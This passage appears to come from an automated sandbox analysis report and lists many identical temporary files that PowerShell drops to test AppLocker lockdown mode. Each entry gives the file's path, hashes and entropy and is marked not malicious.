                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kvmzotg.yx5.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12cntsil.tjk.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13usj5k2.j5s.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1svdfwnf.2z3.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43utvbck.twe.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4a3vdqta.mym.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wawdwof.yth.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fu05dyg.qzz.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ags4yegy.rcn.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aitrqj41.vn5.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_angtdqbt.5xj.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2vqpzjd.cpi.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bt0mqpeg.f5c.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drnqd1ay.f0s.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dygjxchq.jzz.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edv5szoe.b2y.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbj2b1ax.2yx.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ft41xuv5.gk3.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0hdgje2.yog.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g123dky3.slo.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdqerjlm.mz5.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtnrppzm.3bw.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoopv0u3.xne.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ij0xys0g.klf.ps1

